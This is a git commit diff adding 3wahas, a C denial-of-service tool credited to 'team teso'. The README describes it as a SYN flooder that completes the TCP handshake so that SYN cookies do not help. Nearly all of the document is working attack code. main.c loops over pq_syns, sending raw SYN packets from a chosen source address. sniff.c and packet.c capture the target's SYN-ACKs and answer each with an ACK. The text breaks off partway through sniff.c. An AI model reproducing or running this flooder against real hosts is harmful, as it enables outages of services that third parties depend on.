summaryrefslogtreecommitdiff
path: root/other/3wahas
diff options
context:
space:
mode:
Diffstat (limited to 'other/3wahas')
-rw-r--r--other/3wahas/3wahas.c51
-rw-r--r--other/3wahas/3wahas.h12
-rw-r--r--other/3wahas/Makefile27
-rw-r--r--other/3wahas/README8
-rw-r--r--other/3wahas/common.c296
-rw-r--r--other/3wahas/common.h26
-rw-r--r--other/3wahas/network.c258
-rw-r--r--other/3wahas/network.h126
-rw-r--r--other/3wahas/packet.c178
-rw-r--r--other/3wahas/packet.h74
-rw-r--r--other/3wahas/sniff.c182
-rw-r--r--other/3wahas/sniff.h41
12 files changed, 1279 insertions, 0 deletions
diff --git a/other/3wahas/3wahas.c b/other/3wahas/3wahas.c
new file mode 100644
index 0000000..d1a119c
--- /dev/null
+++ b/other/3wahas/3wahas.c
@@ -0,0 +1,51 @@
1/* phoenix - bah, fuckup
2 *
3 * by team teso
4 *
5 *
6 */
7
8#include <stdio.h>
9#include <stdlib.h>
10#include <unistd.h>
11#include <string.h>
12#include <libnet.h>
13#include "common.h"
14#include "network.h"
15#include "packet.h"
16#include "3wahas.h"
17#include "sniff.h"
18
19
20int
21main (int argc, char **argv)
22{
23 char *interface = "eth0";
24 char *src_ip, *dst_ip;
25 u_short dst_prt;
26
27 if (argc != 5) {
28 printf ("usage: %s <ip_src> <ip_dst> <ip_dst_port> <delay>\n\n", argv[0]);
29 exit (EXIT_FAILURE);
30 }
31 src_ip = argv[1];
32 dst_ip = argv[2];
33 dst_prt = atoi (argv[3]);
34
35 if (fork () == 0) {
36 while (1) {
37 pq_syns (src_ip, dst_ip, dst_prt);
38 usleep (atoi (argv[4]));
39 }
40 }
41
42 libnet_seed_prand ();
43
44 printf ("3wahas "VERSION" by "AUTHORS" - rox0ring\n\n");
45
46 sniff_new (interface, dst_ip);
47
48 exit (EXIT_SUCCESS);
49}
50
51
diff --git a/other/3wahas/3wahas.h b/other/3wahas/3wahas.h
new file mode 100644
index 0000000..153cac4
--- /dev/null
+++ b/other/3wahas/3wahas.h
@@ -0,0 +1,12 @@
1/* zodiac - advanced dns spoofer
2 *
3 * by scut / teso
4 */
5
6#ifndef Z_PHOENIX_H
7#define Z_PHOENIX_H
8
9#define AUTHORS "team teso"
10#define VERSION "v0.0.1"
11
12#endif
diff --git a/other/3wahas/Makefile b/other/3wahas/Makefile
new file mode 100644
index 0000000..5fa74ee
--- /dev/null
+++ b/other/3wahas/Makefile
@@ -0,0 +1,27 @@
1
2DFLAGS=-g -Wall -DDEBUG -DLIBNET_LIL_ENDIAN
3LIBS=-lpcap -lnet
4CC=gcc
5CFLAGS=$(DFLAGS)
6PREFIX=/usr/local
7
8all: 3wahas
9
10clean:
11 rm -f *.o 3wahas
12
133wahas: common.o network.o sniff.o packet.o 3wahas.c
14 $(CC) $(CFLAGS) -o 3wahas 3wahas.c common.o sniff.o network.o packet.o $(LIBS)
15
16common.o: common.c
17 $(CC) $(CFLAGS) -c common.c
18
19network.o: network.c
20 $(CC) $(CFLAGS) -c network.c
21
22packet.o: packet.c
23 $(CC) $(CFLAGS) -c packet.c
24
25sniff.o: sniff.c
26 $(CC) $(CFLAGS) -c sniff.c
27
diff --git a/other/3wahas/README b/other/3wahas/README
new file mode 100644
index 0000000..3dc66e5
--- /dev/null
+++ b/other/3wahas/README
@@ -0,0 +1,8 @@
13wahas:
2======
3
43wahas stands for 'three way handshake' and is a syn flooder that opens
5a ''real'' connection on reply, so no linux syn cookies should help ;)
6
7written by team teso on the ccc camp '99
8http://teso.scene.at/
diff --git a/other/3wahas/common.c b/other/3wahas/common.c
new file mode 100644
index 0000000..6f8f591
--- /dev/null
+++ b/other/3wahas/common.c
@@ -0,0 +1,296 @@
1
2#include <sys/time.h>
3#include <netinet/in.h>
4#include <unistd.h>
5#include <pthread.h>
6#include <time.h>
7#include <stdarg.h>
8#include <stdio.h>
9#include <string.h>
10#include <stdlib.h>
11#include <unistd.h>
12#include "common.h"
13
14#ifdef DEBUG
15void
16debugp (char *filename, const char *str, ...)
17{
18 FILE *fp; /* temporary file pointer */
19 va_list vl;
20
21 fp = fopen (filename, "a");
22 if (fp == NULL)
23 return;
24
25 va_start (vl, str);
26 vfprintf (fp, str, vl);
27 va_end (vl);
28
29 fclose (fp);
30
31 return;
32}
33
34void
35hexdump (char *filename, unsigned char *data, unsigned int amount)
36{
37 FILE *fp; /* temporary file pointer */
38 unsigned int dp, p; /* data pointer */
39 const char trans[] = "................................ !\"#$%&'()*+,-./0123456789"
40 ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
41 "nopqrstuvwxyz{|}~...................................."
42 "....................................................."
43 "........................................";
44
45 fp = fopen (filename, "a");
46 if (fp == NULL)
47 return;
48
49 fprintf (fp, "\n-packet-\n");
50
51 for (dp = 1; dp <= amount; dp++) {
52 fprintf (fp, "%02x ", data[dp-1]);
53 if ((dp % 8) == 0)
54 fprintf (fp, " ");
55 if ((dp % 16) == 0) {
56 fprintf (fp, "| ");
57 p = dp;
58 for (dp -= 16; dp < p; dp++)
59 fprintf (fp, "%c", trans[data[dp]]);
60 fflush (fp);
61 fprintf (fp, "\n");
62 }
63 fflush (fp);
64 }
65 if ((amount % 16) != 0) {
66 p = dp = 16 - (amount % 16);
67 for (dp = p; dp > 0; dp--) {
68 fprintf (fp, " ");
69 if (((dp % 8) == 0) && (p != 8))
70 fprintf (fp, " ");
71 fflush (fp);
72 }
73 fprintf (fp, " | ");
74 for (dp = (amount - (16 - p)); dp < amount; dp++)
75 fprintf (fp, "%c", trans[data[dp]]);
76 fflush (fp);
77 }
78 fprintf (fp, "\n");
79
80 fclose (fp);
81 return;
82}
83
84#endif
85
86
87/* m_random
88 *
89 * return a random number between `lowmark' and `highmark'
90 */
91
92int
93m_random (int lowmark, int highmark)
94{
95 long int rnd;
96
97 /* flip/swap them in case user messed up
98 */
99 if (lowmark > highmark) {
100 lowmark ^= highmark;
101 highmark ^= lowmark;
102 lowmark ^= highmark;
103 }
104 rnd = lowmark;
105
106 srandom ((unsigned int) time (NULL));
107 rnd += (random () % (highmark - lowmark));
108
109 /* this is lame, i know :)
110 */
111 return (rnd);
112}
113
114
115/* set_tv
116 *
117 * initializes a struct timeval pointed to by `tv' to a second value of
118 * `seconds'
119 *
120 * return in any case
121 */
122
123void
124set_tv (struct timeval *tv, int seconds)
125{
126 tv->tv_sec = seconds;
127 tv->tv_usec = 0;
128
129 return;
130}
131
132
133/* xstrupper
134 *
135 * uppercase a string `str'
136 *
137 * return in any case
138 */
139
140void
141xstrupper (char *str)
142{
143 for (; *str != '\0'; ++str) {
144 if (*str >= 'a' && *str <= 'z') {
145 *str -= ('a' - 'A');
146 }
147 }
148
149 return;
150}
151
152
153/* concating snprintf
154 *
155 * determines the length of the string pointed to by `os', appending formatted
156 * string to a maximium length of `len'.
157 *
158 */
159
160void
161scnprintf (char *os, size_t len, const char *str, ...)
162{
163 va_list vl;
164 char *ostmp = os + strlen (os);
165
166 va_start (vl, str);
167 vsnprintf (ostmp, len - strlen (os) - 1, str, vl);
168 va_end (vl);
169
170 return;
171}
172
173unsigned long int
174tdiff (struct timeval *old, struct timeval *new)
175{
176 unsigned long int time1;
177
178 if (new->tv_sec >= old->tv_sec) {
179 time1 = new->tv_sec - old->tv_sec;
180 if ((new->tv_usec - 500000) >= old->tv_usec)
181 time1++;
182 } else {
183 time1 = old->tv_sec - new->tv_sec;
184 if ((old->tv_usec - 500000) >= new->tv_usec)
185 time1++;
186 }
187
188 return (time1);
189}
190
191
192/* ipv4_print
193 *
194 * padding = 0 -> don't padd
195 * padding = 1 -> padd with zeros
196 * padding = 2 -> padd with spaces
197 */
198
199char *
200ipv4_print (char *dest, struct in_addr in, int padding)
201{
202 unsigned char *ipp;
203
204 ipp = (unsigned char *) &in.s_addr;
205
206 strcpy (dest, "");
207
208 switch (padding) {
209 case (0):
210 sprintf (dest, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
211 break;
212 case (1):
213 sprintf (dest, "%03d.%03d.%03d.%03d", ipp[0], ipp[1], ipp[2], ipp[3]);
214 break;
215 case (2):
216 sprintf (dest, "%3d.%3d.%3d.%3d", ipp[0], ipp[1], ipp[2], ipp[3]);
217 break;
218 default:
219 break;
220 }
221
222 return (dest);
223}
224
225
226void *
227xrealloc (void *m_ptr, size_t newsize)
228{
229 void *n_ptr;
230
231 n_ptr = realloc (m_ptr, newsize);
232 if (n_ptr == NULL) {
233 fprintf (stderr, "realloc failed\n");
234 exit (EXIT_FAILURE);
235 }
236
237 return (n_ptr);
238}
239
240
241char *
242xstrdup (char *str)
243{
244 char *b;
245
246 b = strdup (str);
247 if (b == NULL) {
248 fprintf (stderr, "strdup failed\n");
249 exit (EXIT_FAILURE);
250 }
251
252 return (b);
253}
254
255
256void *
257xcalloc (int factor, size_t size)
258{
259 void *bla;
260
261 bla = calloc (factor, size);
262
263 if (bla == NULL) {
264 fprintf (stderr, "no memory left\n");
265 exit (EXIT_FAILURE);
266 }
267
268 return (bla);
269}
270
271/* source by dk
272 */
273
274char *
275allocncat (char **to, char *from, size_t len)
276{
277 int rlen = strlen (from);
278 int null = *to == NULL;
279
280 len = rlen < len ? rlen : len;
281 *to = realloc (*to, (null ? 0 : strlen (*to)) + len + 1);
282 if (null)
283 **to = '\0';
284
285 if (*to == NULL)
286 perror ("no memory: ");
287
288 return (strncat (*to, from, len));
289}
290
291char *
292alloccat (char **to, char *from)
293{
294 return (allocncat (to, from, strlen (from)));
295}
296
diff --git a/other/3wahas/common.h b/other/3wahas/common.h
new file mode 100644
index 0000000..9f982fe
--- /dev/null
+++ b/other/3wahas/common.h
@@ -0,0 +1,26 @@
1
2#include <sys/time.h>
3#include <netinet/in.h>
4#include <unistd.h>
5
6#ifndef Z_COMMON_H
7#define Z_COMMON_H
8
9#ifdef DEBUG
10void debugp (char *filename, const char *str, ...);
11void hexdump (char *filename, unsigned char *data, unsigned int amount);
12#endif
13int m_random (int lowmark, int highmark);
14void set_tv (struct timeval *tv, int seconds);
15void xstrupper (char *str);
16void scnprintf (char *os, size_t len, const char *str, ...);
17unsigned long int tdiff (struct timeval *old, struct timeval *new);
18char *ipv4_print (char *dest, struct in_addr in, int padding);
19void *xrealloc (void *m_ptr, size_t newsize);
20char *xstrdup (char *str);
21void *xcalloc (int factor, size_t size);
22char *allocncat (char **to, char *from, size_t len);
23char *alloccat (char **to, char *from);
24
25#endif
26
diff --git a/other/3wahas/network.c b/other/3wahas/network.c
new file mode 100644
index 0000000..0243306
--- /dev/null
+++ b/other/3wahas/network.c
@@ -0,0 +1,258 @@
1
2/* zodiac - advanced dns spoofer
3 *
4 * network primitives
5 *
6 * by scut / teso
7 *
8 * nearly all of this code wouldn't have been possible without w. richard stevens
9 * excellent network coding book. if you are interested in network coding,
10 * there is no way around it.
11 */
12
13#include <sys/types.h>
14#include <sys/ioctl.h>
15#include <sys/socket.h>
16#include <sys/time.h>
17#include <arpa/inet.h>
18#include <netdb.h>
19#include <net/if.h>
20#include <netinet/in.h>
21#include <errno.h>
22#include <fcntl.h>
23#include <stdarg.h>
24#include <stdio.h>
25#include <stdlib.h>
26#include <string.h>
27#include <unistd.h>
28#include "network.h"
29
30
31int
32net_parseip (char *inp, char **ip, unsigned short int *port)
33{
34 int n;
35
36 if (inp == NULL)
37 return (0);
38 if (strchr (inp, ':') == NULL)
39 return (0);
40
41 *ip = calloc (1, 256);
42 if (*ip == NULL)
43 return (0);
44
45 n = sscanf (inp, "%[^:]:%hu", *ip, port);
46 if (n != 2)
47 return (0);
48
49 *ip = realloc (*ip, strlen (*ip) + 1);
50 if (*ip == NULL || (*port < 1 || *port > 65535))
51 return (0);
52
53 return (1);
54}
55
56
57char *
58net_getlocalip (void)
59{
60 struct sockaddr_in pf;
61 char name[255];
62
63 memset (name, '\0', sizeof (name));
64
65 if (gethostname (name, sizeof (name) - 1) == -1) {
66 return (NULL);
67 }
68
69 pf.sin_addr.s_addr = net_resolve (name);
70
71 return (strdup (inet_ntoa (pf.sin_addr)));;
72}
73
74
75void
76net_ifi_free (struct ifi_info *tf)
77{
78 struct ifi_info *ifi, *ifil;
79
80 ifil = NULL;
81 for (ifi = tf; ifi != NULL; ifi = ifi->ifi_next) {
82 if (ifil)
83 free (ifil);
84 if (ifi->ifi_addr)
85 free (ifi->ifi_addr);
86 ifil = ifi;
87 }
88 if (ifil)
89 free (ifil);
90 return;
91}
92
93
94struct ifi_info *
95net_ifi_get (int family, int doaliases)
96{
97 struct ifi_info *ifi, *ifihead, **ifipnext;
98 int sockfd, len, lastlen, flags, myflags;
99 char *ptr, *buf, lastname[IFNAMSIZ], *cptr;
100 struct ifconf ifc;
101 struct ifreq *ifr, ifrcopy;
102 struct sockaddr_in *sinptr;
103
104 sockfd = socket(AF_INET, SOCK_DGRAM, 0);
105 if (sockfd == -1)
106 return (NULL);
107
108 lastlen = 0;
109 len = 100 * sizeof(struct ifreq);
110 for (;;) {
111 buf = malloc(len);
112 if (buf == NULL)
113 return (NULL);
114 ifc.ifc_len = len;
115 ifc.ifc_buf = buf;
116 if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) {
117 if (errno != EINVAL || lastlen != 0)
118 return (NULL);
119 } else {
120 if (ifc.ifc_len == lastlen)
121 break;
122 lastlen = ifc.ifc_len;
123 }
124 len += 10 * sizeof(struct ifreq);
125 free (buf);
126 }
127 ifihead = NULL;
128 ifipnext = &ifihead;
129 lastname[0] = 0;
130
131 for (ptr = buf; ptr < buf + ifc.ifc_len;) {
132 ifr = (struct ifreq *) ptr;
133 if (ifr->ifr_addr.sa_family == AF_INET)
134 len = sizeof(struct sockaddr);
135 ptr += sizeof(ifr->ifr_name) + len;
136
137 if (ifr->ifr_addr.sa_family != family)
138 continue;
139 myflags = 0;
140 if ((cptr = strchr(ifr->ifr_name, ':')) != NULL)
141 *cptr = 0;
142 if (strncmp(lastname, ifr->ifr_name, IFNAMSIZ) == 0) {
143 if (doaliases == 0)
144 continue;
145 myflags = IFI_ALIAS;
146 }
147 memcpy(lastname, ifr->ifr_name, IFNAMSIZ);
148
149 ifrcopy = *ifr;
150 if (ioctl(sockfd, SIOCGIFFLAGS, &ifrcopy) < 0)
151 return (NULL);
152 flags = ifrcopy.ifr_flags;
153 if ((flags & IFF_UP) == 0)
154 continue;
155
156 ifi = calloc(1, sizeof(struct ifi_info));
157 if (ifi == NULL)
158 return (NULL);
159 *ifipnext = ifi;
160 ifipnext = &ifi->ifi_next;
161 ifi->ifi_flags = flags;
162 ifi->ifi_myflags = myflags;
163 memcpy(ifi->ifi_name, ifr->ifr_name, IFI_NAME);
164 ifi->ifi_name[IFI_NAME - 1] = '\0';
165
166#ifdef DEBUG
167 printf("got: %s\n", ifi->ifi_name);
168#endif
169
170 switch (ifr->ifr_addr.sa_family) {
171 case AF_INET:
172 sinptr = (struct sockaddr_in *) &ifr->ifr_addr;
173 memcpy(&ifi->ifi_saddr, &sinptr->sin_addr, sizeof(struct in_addr));
174 if (ifi->ifi_addr == NULL) {
175 ifi->ifi_addr = calloc(1, sizeof(struct sockaddr_in));
176 if (ifi->ifi_addr == NULL)
177 return (NULL);
178 memcpy(ifi->ifi_addr, sinptr, sizeof(struct sockaddr_in));
179 }
180 break;
181 default:
182 break;
183 }
184 }
185 free (buf);
186 return (ifihead);
187}
188
189
190/* partly based on resolv routine from ?
191 */
192
193unsigned long int
194net_resolve (char *host)
195{
196 long i;
197 struct hostent *he;
198
199 if (host == NULL)
200 return (htonl (INADDR_ANY));
201
202 if (strcmp (host, "*") == 0)
203 return (htonl (INADDR_ANY));
204
205 i = inet_addr (host);
206 if (i == -1) {
207 he = gethostbyname (host);
208 if (he == NULL) {
209 return (0);
210 } else {
211 return (*(unsigned long *) he->h_addr);
212 }
213 }
214 return (i);
215}
216
217
218int
219net_printipr (struct in_addr *ia, char *str, size_t len)
220{
221 unsigned char *ipp;
222
223 ipp = (unsigned char *) &ia->s_addr;
224 snprintf (str, len - 1, "%d.%d.%d.%d", ipp[3], ipp[2], ipp[1], ipp[0]);
225
226 return (0);
227}
228
229
230int
231net_printip (struct in_addr *ia, char *str, size_t len)
232{
233 unsigned char *ipp;
234
235 ipp = (unsigned char *) &ia->s_addr;
236 snprintf (str, len - 1, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
237
238 return (0);
239}
240
241
242int
243net_printipa (struct in_addr *ia, char **str)
244{
245 unsigned char *ipp;
246
247 ipp = (unsigned char *) &ia->s_addr;
248 *str = calloc (1, 256);
249 if (*str == NULL)
250 return (1);
251
252 snprintf (*str, 255, "%3d.%3d.%3d.%3d", ipp[0], ipp[1], ipp[2], ipp[3]);
253 *str = realloc (*str, strlen (*str) + 1);
254
255 return ((*str == NULL) ? 1 : 0);
256}
257
258
diff --git a/other/3wahas/network.h b/other/3wahas/network.h
new file mode 100644
index 0000000..b244165
--- /dev/null
+++ b/other/3wahas/network.h
@@ -0,0 +1,126 @@
1
2/* zodiac - advanced dns spoofer
3 *
4 * ripped down network.c for use with zodiac
5 *
6 * by scut / teso
7 */
8
9#ifndef Z_NETWORK_H
10#define Z_NETWORK_H
11
12#include <sys/socket.h>
13#include <net/if.h>
14#include <netinet/in.h>
15#include <stdio.h>
16
17#define IFI_NAME 16
18#define IFI_HADDR 8
19
20/* struct ifi_info
21 *
22 * a linked list giving information about all the network interfaces available
23 * a pointer to this struct list is returned by net_get_ifi.
24 */
25
26struct ifi_info {
27 char ifi_name[IFI_NAME];
28 u_char ifi_haddr[IFI_HADDR];
29 u_short ifi_hlen;
30 short ifi_flags;
31 short ifi_myflags;
32 struct sockaddr *ifi_addr;
33 struct in_addr ifi_saddr;
34 struct ifi_info *ifi_next;
35};
36
37#define IFI_ALIAS 1
38
39typedef struct bound {
40 int bs; /* bound socket */
41 unsigned short port; /* port we bound to */
42 struct sockaddr bsa; /* bs_in */
43} bound;
44
45extern int net_readtimeout;
46extern int net_conntimeout;
47extern int net_identtimeout;
48
49
50/* net_parseip
51 *
52 * read an ip in the format "1.1.1.1:299" or "blabla:481" into
53 * the char pointer *ip and into the port *port
54 *
55 * return 0 on failure
56 * return 1 on success
57 */
58
59int net_parseip (char *inp, char **ip, unsigned short int *port);
60
61
62/* net_getlocalip
63 *
64 * give back the main IP of the local machine
65 *
66 * return the local IP address as string on success
67 * return NULL on failure
68 */
69
70char *net_getlocalip (void);
71
72
73/* net_get_ifi
74 *
75 * get network interface information
76 *
77 * return NULL on failure
78 * return a pointer to a linked list structure ifi_info (see above)
79 */
80
81struct ifi_info *net_ifi_get (int family, int doaliases);
82
83
84/* net_ifi_free
85 *
86 * free the linked list associated with `tf'.
87 *
88 * return in any case
89 */
90
91void net_ifi_free (struct ifi_info *tf);
92
93
94/* net_resolve
95 *
96 * resolve a hostname pointed to by `host' into a s_addr return value
97 *
98 * return the correct formatted `s_addr' for this host on success
99 * return 0 on failure
100 */
101
102unsigned long int net_resolve (char *host);
103
104
105/* net_printip
106 *
107 * print an IP address stored in the struct in_addr pointed to by `ia' to a
108 * string `str' with a maximum length of `len'.
109 *
110 * return 0 on success
111 *Üreturn 1 on failure
112 *
113 * net_printipa behaves the same way, except it allocates memory and let
114 * `*str' point to the string
115 *
116 * net_printipr behaves like net_printip, except the IP is printed in
117 * reverse quad dotted order (dns labels)
118 */
119
120int net_printip (struct in_addr *ia, char *str, size_t len);
121int net_printipa (struct in_addr *ia, char **str);
122int net_printipr (struct in_addr *ia, char *str, size_t len);
123
124
125#endif
126
diff --git a/other/3wahas/packet.c b/other/3wahas/packet.c
new file mode 100644
index 0000000..7dd521a
--- /dev/null
+++ b/other/3wahas/packet.c
@@ -0,0 +1,178 @@
1/* zodiac - advanced dns spoofer
2 *
3 * packet handling and queueing routines
4 * by scut
5 */
6
7#include <sys/types.h>
8#include <sys/socket.h>
9#include <sys/time.h>
10#include <netinet/in.h>
11#include <netinet/if_ether.h>
12#include <arpa/inet.h>
13#include <unistd.h>
14#include <stdio.h>
15#include <stdlib.h>
16#include <string.h>
17#include <libnet.h>
18#include <pcap.h>
19#include "common.h"
20#include "packet.h"
21#include "network.h"
22#include "sniff.h"
23#include "3wahas.h"
24
25
26/* pq_grind
27 *
28 * grind the packets received from the sniffer thread, stripping ethernet
29 * header, filter non-TCP packets, add them to the packet queue, then raise
30 * the correct semaphore.
31 *
32 * `sinfo' gives information about the sniffing thread and the packet queue,
33 * `pkthdr' is from the pcap handler and `pkt' contains the real packet data.
34 */
35
36void
37pq_grind (void *sinfov, struct pcap_pkthdr *pkthdr, u_char *pkt)
38{
39 size_t psize;
40 sniff_info *sinfo = (sniff_info *) sinfov;
41 eth_hdr *eth = (eth_hdr *) pkt;
42 ip_hdr *ip; /* IP packet header pointer */
43 tcp_hdr *tcp; /* UDP packet header pointer */
44 char *ip_src, *ip_dst;
45
46 /* check if it is a IP/UDP packet, if not, silently skip it
47 */
48 if (pkthdr->caplen < (sizeof (eth_hdr) + sizeof (tcp_hdr)))
49 return;
50 if (eth->eth_type != htons (ETH_P_IP))
51 return;
52
53 ip = (ip_hdr *) (pkt + sizeof (eth_hdr));
54 tcp = (tcp_hdr *) (pkt + sizeof (eth_hdr) + sizeof (ip_hdr));
55
56 psize = pkthdr->caplen - sizeof (eth_hdr);
57
58 if (ip->ip_proto != IPPROTO_TCP)
59 return;
60
61 if ((ip->ip_src.s_addr != sinfo->ip_dst.s_addr))
62 return;
63
64 if (((tcp->th_flags & TH_SYN) != TH_SYN) || ((tcp->th_flags & TH_ACK) != TH_ACK))
65 return;
66
67 net_printipa (&ip->ip_src, &ip_src);
68 net_printipa (&ip->ip_dst, &ip_dst);
69
70 printf ("[%s:%5u] -> [%s:%5u] %c%c%c%c\n",
71 ip_src, htons (tcp->th_sport),
72 ip_dst, htons (tcp->th_dport),
73 ((tcp->th_flags & TH_SYN) == TH_SYN) ? 'Y' : ' ',
74 ((tcp->th_flags & TH_ACK) == TH_ACK) ? 'A' : ' ',
75 ((tcp->th_flags & TH_FIN) == TH_FIN) ? 'F' : ' ',
76 ((tcp->th_flags & TH_RST) == TH_RST) ? 'R' : ' ');
77
78 pq_3whs (ip, tcp);
79
80 free (ip_src);
81 free (ip_dst);
82 return;
83}
84
85
86void
87pq_3whs (struct ip_hdr *ip, struct tcp_hdr *tcp)
88{
89 u_char *buf = xcalloc (1, sizeof (ip_hdr) + sizeof (tcp_hdr));
90 int sock = open_raw_sock (IPPROTO_RAW);
91
92 if (sock == -1) {
93 free (buf);
94 return;
95 }
96
97 build_ip (TCP_H,
98 0,
99 1911,
100 0,
101 64,
102 IPPROTO_TCP,
103 ip->ip_dst.s_addr,
104 ip->ip_src.s_addr,
105 NULL,
106 0,
107 buf);
108
109 build_tcp (htons (tcp->th_dport),
110 htons (tcp->th_sport),
111 libnet_get_prand (PRu32), /* seq */
112 htonl (tcp->th_seq) + 1, /* yeah */
113 TH_ACK,
114 1024,
115 0,
116 NULL,
117 0,
118 buf + IP_H);
119
120 do_checksum (buf, IPPROTO_TCP, TCP_H);
121 write_ip (sock, buf, TCP_H + IP_H);
122
123 free (buf);
124 close (sock);
125
126 return;
127}
128
129
130void
131pq_syns (char *ip_src_c, char *ip_dst_c, u_short dst_prt)
132{
133 u_char *buf = xcalloc (1, sizeof (ip_hdr) + sizeof (tcp_hdr));
134 int sock = open_raw_sock (IPPROTO_RAW);
135 struct in_addr ip_src,
136 ip_dst;
137
138 ip_src.s_addr = net_resolve (ip_src_c);
139 ip_dst.s_addr = net_resolve (ip_dst_c);
140
141 if (sock == -1) {
142 free (buf);
143 return;
144 }
145
146 build_ip (TCP_H,
147 0,
148 1911,
149 0,
150 64,
151 IPPROTO_TCP,
152 ip_src.s_addr,
153 ip_dst.s_addr,
154 NULL,
155 0,
156 buf);
157
158 build_tcp (libnet_get_prand (PRu16),
159 dst_prt,
160 libnet_get_prand (PRu32),
161 0,
162 TH_SYN,
163 1024,
164 0,
165 NULL,
166 0,
167 buf + IP_H);
168
169 do_checksum (buf, IPPROTO_TCP, TCP_H);
170 write_ip (sock, buf, TCP_H + IP_H);
171
172 free (buf);
173 close (sock);
174
175 return;
176}
177
178
diff --git a/other/3wahas/packet.h b/other/3wahas/packet.h
new file mode 100644
index 0000000..4bc5b65
--- /dev/null
+++ b/other/3wahas/packet.h
@@ -0,0 +1,74 @@
1/* snifflib
2 *
3 * by scut
4 *
5 */
6
7#ifndef Z_PACKET_H
8#define Z_PACKET_H
9
10#include <sys/types.h>
11#include <sys/time.h>
12#include <unistd.h>
13#include <netinet/in.h>
14#include <pcap.h>
15#include <semaphore.h>
16#include <pthread.h>
17
18/* packet structures
19 * parts ripped from snorts excellent include files
20 */
21
22
23typedef struct eth_hdr
24{
25 u_char eth_dst[6]; /* ethernet destination address (MAC) */
26 u_char eth_src[6]; /* ethernet source address (MAC) */
27 u_short eth_type; /* enclosed packet type */
28} eth_hdr;
29
30typedef struct ip_hdr
31{
32 u_char ip_hlen:4, ip_ver:4; /* IP header length, IP version */
33 u_char ip_tos; /* IP type of service */
34 u_short ip_len; /* IP data length */
35 u_short ip_id; /* IP fragmentation identification */
36 u_short ip_off; /* IP fragment offset */
37 u_char ip_ttl; /* IP time to live */
38 u_char ip_proto; /* subprotocol of enclosed packet */
39 u_short ip_csum; /* IP header checksum */
40 struct in_addr ip_src; /* IP source address */
41 struct in_addr ip_dst; /* IP destination address */
42} ip_hdr;
43
44#define TH_FIN 0x01
45#define TH_SYN 0x02
46#define TH_RST 0x04
47#define TH_PUSH 0x08
48#define TH_ACK 0x10
49#define TH_URG 0x20
50
51typedef struct tcp_hdr
52{
53 u_short th_sport;
54 u_short th_dport;
55 u_long th_seq;
56 u_long th_ack;
57 u_char th_x2:4, th_off:4;
58 u_char th_flags;
59 u_short th_win;
60 u_short th_sum;
61 u_short th_urp;
62} tcp_hdr;
63
64
65#define ETHHDRSIZE sizeof (eth_hdr);
66#define IPHDRSIZE sizeof (ip_hdr);
67
68
69void pq_grind (void *sinfov, struct pcap_pkthdr *pkthdr, unsigned char *pkt);
70void pq_3whs (struct ip_hdr *ip, struct tcp_hdr *tcp);
71void pq_syns (char *ip_src_c, char *ip_dst_c, u_short dst_prt);
72
73#endif
74
diff --git a/other/3wahas/sniff.c b/other/3wahas/sniff.c
new file mode 100644
index 0000000..826638d
--- /dev/null
+++ b/other/3wahas/sniff.c
@@ -0,0 +1,182 @@
1/* zodiac - advanced dns spoofer
2 *
3 * sniffing functions
4 *
5 * by scut
6 *
7 */
8
9#include <stdio.h>
10#include <stdlib.h>
11#include <string.h>
12#include <pcap.h>
13#include <pthread.h>
14#include "common.h"
15#include "network.h"
16#include "packet.h"
17#include "sniff.h"
18#include "3wahas.h"
19
20/* sniff_new
21 *
22 * the only function that should be called from outside. set up sniffing
23 * device, create a new thread, then return.
24 * open `interface' device for sniffing, tell sniffing thread to use
25 * `pq_size' packet queues, available through `pq_list'.
26 * store thread id of new thread in `tid'.
27 *
28 * return 0 if thread creation was successful
29 * return 1 if thread creation failed
30 */
31
32void
33sniff_new (char *interface, char *ip_dst)
34{
35 sniff_info *sinfo; /* sniff information structure */
36
37 sinfo = xcalloc (1, sizeof (sniff_info));
38
39 sinfo->ip_dst.s_addr = net_resolve (ip_dst);
40
41 /* open interface
42 */
43 sinfo->device = sniff_open (interface);
44 if (sinfo->device == NULL) {
45 free (sinfo);
46 return;
47 }
48
49 sniff_handle (sinfo);
50 /* successfully created sniffer thread
51 */
52 return;
53}
54
55/* sniff_handle
56 *
57 * the main sniffing thread, fetching packets from the device, then calling
58 * the packet grinder `pq_grind' to process the packets
59 *
60 * should never return except on error or program exit
61 */
62
63void *
64sniff_handle (sniff_info *sinfo)
65{
66 int n; /* temporary return value */
67 pcap_handler grinder; /* pcap handler for the packet grinding function */
68
69 printf ("[phx] hello world from sniff handler\n\n");
70 grinder = (pcap_handler) pq_grind;
71 n = pcap_loop (sinfo->device->pd, -1, grinder, (void *) sinfo);
72
73 if (n == -1) {
74 printf ("[phx] sniff_handle (pcap_loop): %s\n", pcap_geterr (sinfo->device->pd));
75 }
76
77 return (NULL);
78}
79
80/* sniff_open
81 *
82 * open `dev' for sniffing, or just the first sniffable one, if
83 * dev is NULL.
84 *
85 * return NULL on failure
86 * return pointer sniffing device structure on success
87 */
88
89s_dev *
90sniff_open (char *devname)
91{
92 int n; /* temporary return value */
93 s_dev *device; /* sniffing device structure to create */
94 char errorbuf[PCAP_ERRBUF_SIZE]; /* error buffer for pcap message */
95
96 /* create new sniffing device structure in s_dev
97 */
98 device = xcalloc (1, sizeof (s_dev));
99
100 /* check wether to use the first device or a specified device
101 */
102 if (devname == NULL) {
103 /* due to lame pcap manpage, you should not know that it's static *doh* */
104 device->interface = pcap_lookupdev (errorbuf);
105 if (device->interface == NULL) {
106 printf ("[phx] sniff_open (pcap_lookupdev): %s\n", errorbuf);
107 device->error = 1;
108 return (device);
109 }
110 } else {
111 /* if the interface we have to use is already known just copy it
112 */
113 device->interface = xstrdup (devname);
114 }
115
116 /* try to open the device found
117 */
118 device->pd = sniff_pcap_open (device->interface);
119 if (device->pd == NULL) {
120 device->error = 1;
121 return (device);
122 }
123
124 /* now query some information about the device and store them into our struct
125 */
126 n = pcap_lookupnet (device->interface, &device->localnet,
127 &device->netmask, errorbuf);
128 if (n == -1) {
129 device->error = 1;
130 return (device);
131 }
132
133 device->linktype = pcap_datalink (device->pd);
134 if (device->linktype == -1) {
135 device->error = 1;
136 return (device);
137 }
138
139 return (device);
140}
141
142/* sniff_pcap_open
143 *
144 * securely wraps the pcap_open_live call to catch any errors
145 *
146 * return NULL on failure
147 * return capture descriptor on succes
148 */
149
150pcap_t *
